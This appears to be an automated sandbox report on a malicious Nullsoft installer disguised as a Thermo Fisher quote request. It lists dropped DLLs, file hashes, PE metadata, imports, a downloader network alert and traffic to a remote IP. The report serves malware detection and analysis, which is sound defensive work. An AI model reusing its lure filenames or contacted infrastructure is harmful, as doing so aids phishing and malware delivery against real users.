                                            Preview:.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):407199
                                            Entropy (8bit):1.2437541055056829
                                            Encrypted:false
                                            SSDEEP:1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
                                            MD5:D2D56C0A1BC3F0AE364C30A638393597
                                            SHA1:B564662188D504D42B22E18A487BF35503B87AF5
                                            SHA-256:E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
                                            SHA-512:2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
                                            Malicious:false
                                            Preview:..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):186880
                                            Entropy (8bit):1.2601075629320995
                                            Encrypted:false
                                            SSDEEP:768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
                                            MD5:AA2CD52ABEA96B7E317691ADD713125D
                                            SHA1:B34046DE9D9A275896762FD53A2DFF2D382EAE56
                                            SHA-256:C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
                                            SHA-512:AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
                                            Malicious:false
                                            Preview:..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):115746
                                            Entropy (8bit):2.663564699952671
                                            Encrypted:false
                                            SSDEEP:1536:qku528DVwwkDee3DypumYQlBJjspxVhcoG/5V79OeEbuw2W4Oep9Y4H:7M2oT8Gp8GABWWe
                                            MD5:3A3D3671B7BCCEDA2CE7A8E26AE6E470
                                            SHA1:9B78F8D751482C6AB6515066A3145433152DC678
                                            SHA-256:C2377F8B2ED11EEABCC20008F119F12EC7A3D1519BCEEBD5F749133A22704422
                                            SHA-512:D5BB8C5F439D09DEA4FDCA5FB29EF175C14F60AD4D8489FF3C37763FE2A5A50174253D45F1681C4A150DBA46F0E59768F5346205CAF9717330C1A0369ED0B269
                                            Malicious:false
                                            Preview:0000000000007B008700AFAFAFAF0000AE000000FC007B7B0000009C9C00F200FFFF004000505000000000FFFF00BE002A2A000046000000530062004A4A00E00000000000410000C2C20000D9003100A0000000FC000000C200E50095001400008700E400005E0000000000FD00006C6C6C00AA00EF00D8D8D80000A4A40000004A0000006700000002005C000000D8001C004200EEEEEEEEEEEE00A2A2000000000000004D4D0000009090002A2A0000000000C1C1C100D7000047470000000000D8D8D80000C500005F5F0000000000EEEEEEEE00DD00ED000000E0000000F2F200E90000000000DC00460054540000C5C5005959002323000D00001010100000000000000000181800000000C8000000E6003D00002E005A00000074009F9F9F9F9F005200E2E2E20000F3F300000000007400005B5B0000B5B5003100009F9F00007F00E50000530000000000000000181818006A6A000000B5000E0E003E00F4007878000000008A8A8A009F0000A0000000004A4A0000CACA000000C5006D6D007575750000656500000000004B006A6A0000003B00DC0000A9000000000000000000C300A1A1008F8F001F1F1F00000000E0005200006767676767000000CC00CDCD000000003A0000F7F7F7F7F70000000002020000000016000000F5F500000000D3007474006500F8002200000093
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):5632
                                            Entropy (8bit):3.817430038996001
                                            Encrypted:false
                                            SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                            MD5:549EE11198143574F4D9953198A09FE8
                                            SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                            SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                            SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                            • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                            • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                            • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                            • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                            • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                            • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                            • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.804946284177748
                                            Encrypted:false
                                            SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                            MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                            SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                            SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                            SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                            • Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse
                                            • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                            • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                            • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                            • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                            • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                            • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                            • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):4096
                                            Entropy (8bit):3.3415738744933092
                                            Encrypted:false
                                            SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                            MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                            SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                            SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                            SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):9728
                                            Entropy (8bit):5.157714967617029
                                            Encrypted:false
                                            SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                            MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                            SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                            SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                            SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7168
                                            Entropy (8bit):5.295306975422517
                                            Encrypted:false
                                            SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                            MD5:11092C1D3FBB449A60695C44F9F3D183
                                            SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                            SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                            SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.94032852740242
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Thermo Fisher RFQ_TFS-1207.com.exe
                                            File size:605'160 bytes
                                            MD5:9768c048c979aeeeeb051574d452b626
                                            SHA1:414d48d77fc71d29e58a92d02fa2d770fb854339
                                            SHA256:19b8eabc143b4307a4496fec6012965f918e18d0e33a989292568f37a4c5f1ba
                                            SHA512:9153c973c3ed1f5f1964671e084b1bd764d9850fd87feab3a78acf417178d8f32ee6c16c044020979066bf4b2ad7e2e1e3449a7df3954f78ab9ce9ea649c9bce
                                            SSDEEP:12288:QG05Z3OJwnoJIn8f/FAOeanklK9N8QGMi7B1mSwIhCjVnj:QGz4om8ftAOLKwuQWB1mSlCjVj
                                            TLSH:DDD42212D7A0B613D8A2A7356D3D7DE78D3A8C1C5A39D23537113B1A3FB61821D8DE06
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....
                                            Icon Hash:0f3341494d490706
                                            Entrypoint:0x40352f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                            Instruction
                                            sub esp, 000003F8h
                                            push ebp
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebp, ebp
                                            push 00008001h
                                            mov dword ptr [esp+20h], ebp
                                            mov dword ptr [esp+18h], 0040A2D8h
                                            mov dword ptr [esp+14h], ebp
                                            call dword ptr [004080A4h]
                                            mov esi, dword ptr [004080A8h]
                                            lea eax, dword ptr [esp+34h]
                                            push eax
                                            mov dword ptr [esp+4Ch], ebp
                                            mov dword ptr [esp+0000014Ch], ebp
                                            mov dword ptr [esp+00000150h], ebp
                                            mov dword ptr [esp+38h], 0000011Ch
                                            call esi
                                            test eax, eax
                                            jne 00007F48B56A99FAh
                                            lea eax, dword ptr [esp+34h]
                                            mov dword ptr [esp+34h], 00000114h
                                            push eax
                                            call esi
                                            mov ax, word ptr [esp+48h]
                                            mov ecx, dword ptr [esp+62h]
                                            sub ax, 00000053h
                                            add ecx, FFFFFFD0h
                                            neg ax
                                            sbb eax, eax
                                            mov byte ptr [esp+0000014Eh], 00000004h
                                            not eax
                                            and eax, ecx
                                            mov word ptr [esp+00000148h], ax
                                            cmp dword ptr [esp+38h], 0Ah
                                            jnc 00007F48B56A99C8h
                                            and word ptr [esp+42h], 0000h
                                            mov eax, dword ptr [esp+40h]
                                            movzx ecx, byte ptr [esp+3Ch]
                                            mov dword ptr [007A8318h], eax
                                            xor eax, eax
                                            mov ah, byte ptr [esp+38h]
                                            movzx eax, ax
                                            or eax, ecx
                                            xor ecx, ecx
                                            mov ch, byte ptr [esp+00000148h]
                                            movzx ecx, cx
                                            shl eax, 10h
                                            or eax, ecx
                                            movzx ecx, byte ptr [esp+0000004Eh]
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d70000x5bd8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x66d10x68001cb1571d2754df0a2b7df66b1b8d9089False0.6727388822115384data6.4708065613184305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x39e3780x60092e7d2d711bd61815cb4cc2d30d795b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x3a90000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x3d70000x5bd80x5c00404c9a09ca105dd1961875fba238a9eeFalse0.4190726902173913data4.970988770122037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x3d72380x5000Device independent bitmap graphic, 70 x 140 x 32, image size 19600EnglishUnited States0.413525390625
                                            RT_DIALOG0x3dc2380xb8dataEnglishUnited States0.6467391304347826
                                            RT_DIALOG0x3dc2f00x144dataEnglishUnited States0.5216049382716049
                                            RT_DIALOG0x3dc4380x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x3dc5380x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x3dc6580x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x3dc6b80x14dataEnglishUnited States1.1
                                            RT_VERSION0x3dc6d00x274dataEnglishUnited States0.49203821656050956
                                            RT_MANIFEST0x3dc9480x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625
                                            DLLImport
                                            ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                            SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                            ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                            USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                            KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                            2024-08-29T21:56:43.611985+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249838443192.168.11.20199.217.106.226
                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 29, 2024 21:56:43.124260902 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.124365091 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.124538898 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.149547100 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.149614096 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.393348932 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.394016027 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.448733091 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.448813915 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.449960947 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.450093985 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.452749968 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.496220112 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.612030983 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.612169981 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.612266064 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.612332106 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.612361908 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.612361908 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.612361908 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.612452030 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.612581015 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.724863052 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.725076914 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.725223064 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.725275040 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.725306034 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.725377083 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.725544930 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.725799084 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.725964069 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.725964069 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.726016045 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.765754938 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.766408920 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.766410112 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.839121103 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.839406967 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.840006113 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.840269089 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.840562105 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.840733051 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.840930939 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.841402054 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.841589928 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.841720104 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.841944933 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.842109919 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.842184067 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.878062010 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.878221035 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.878386974 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.878453016 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.878614902 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.878720999 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955332041 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.955493927 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955594063 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.955622911 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955652952 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.955728054 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955728054 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955775023 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955862999 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.955872059 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955900908 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.955997944 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.955997944 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956046104 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956125975 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.956144094 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956166983 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.956271887 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956334114 CEST49838443192.168.11.20199.217.106.226
                                            Aug 29, 2024 21:56:43.956437111 CEST44349838199.217.106.226192.168.11.20
                                            Aug 29, 2024 21:56:43.956583977 CEST49838443192.168.11.20199.217.106.226
